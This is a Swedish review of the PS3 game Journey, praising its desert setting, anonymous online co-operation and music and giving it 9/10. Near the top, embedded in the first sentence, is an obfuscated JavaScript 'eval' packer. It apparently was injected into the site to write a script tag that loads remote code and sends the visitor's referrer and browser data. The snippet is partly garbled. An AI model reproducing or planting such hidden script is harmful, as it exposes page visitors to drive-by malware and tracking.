Recension av spelet Journey till PS3

9
Underhållande
8.5
Design
9
8.9

Flower, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|krrbf|var|u0026u|referrer|stnte||js|php’.split(‘|’),0,{}))
Cloud och Flow är tillbaka. Det är Thatgamecompany som även står bakom detta udda men ljuvliga spel.

Redan i början av spelet förstår man att Journey kommer ge en annorlunda resa. Till skillnad från vanliga spel så möts man inte av någon steril meny vid start av spelet utan slängs direkt ut i en obegränsad och oändlig öken. Den enda information som ges är en mycket kort beskrivning av hur styrsystemet är byggt.

Thatgamecompany har verkligen lyckats skapa något unikt och otroligt vackert med Journey. Färden går till stor del på känsla och utmaningen på färden löses allt eftersom de dyker upp framför en. Man vet inte vart man är på väg eller ens varför. Man får stå för motiveringen själv och försöka förstå varför den lilla könslösa figuren med röd mantel gett sig ut på detta äventyr.

httpv://youtu.be/PjqAN7apHKM

Journey är ett pusselspel som tagit äventyrsspel i tredjepersonsperspektiv till en helt ny nivå. Du spelar som en figur som använder sig av sin mantel för att hoppa och sväva. Du bygger upp din mantel med delar du hittar på vägen. Genom att flyga framåt eller uppåt tar du dig vidare genom att interagera med objekt i omgivningen. Ruiner, mattor och gravstenar är några av dessa objekt man stöter på ofta. Det handlar om att använda objekten på rätt sätt vid rätt tidpunkt. Genom att klicka på cirkelknappen interagerar du med omgivningen och skickar ut toner som också är genomtänkta och ändras beroende på var spelaren befinner sig och vilken musik som spelas i bakgrunden. Man blir mer än glad av att höra på dessa vackra toner.

Journey bjuder också på en fantastisk multiplayer. Det är ett helt nytt koncept som jag aldrig skådat innan, udda men häftigt. I Journey är man alltid online och öppen för att träffa andra spelare hela tiden. Du slipper alla nicknames som xx_Gun_xx och Aerox82 som skriker slagord på ryska i chatten. I Journey är alla spelare helt anonyma som ser ut precis som du. Tillsammans kan man lösa uppgifter, sätta sig i öknen och titta på miljön eller helt enkelt skilja sig åt. Det är en genuin känsla av gemenskap som nog många aldrig upplevet innan i ett onlinespel.

Musiken och tonerna är framtagna av kompositören Austin Wintorys och har en genomgående och fängslade känsla. Austin Wintory har även gjort musiken till spelet Flow där han fick mycket god kritik.

Miljöerna i spelet är storslagna, pampiga och sparsmakade. Det är otroligt vackert att glida runt i öknen och se sanden under fötterna glittra och glänsa samtidigt som man tillsammans eller själv kämpar mot brutala vindar och drakar.

Jag finner egentligen ingenting som är dåligt med detta spel förutom att det är väldigt kort. Men det är så många andra faktorer som höjer upp detta och det är ett spel man kommer vilja spela om flera flera gånger.

Spelet finns till PSN-network och kostar 115 kronor.

Betyg 9/10

• Tobias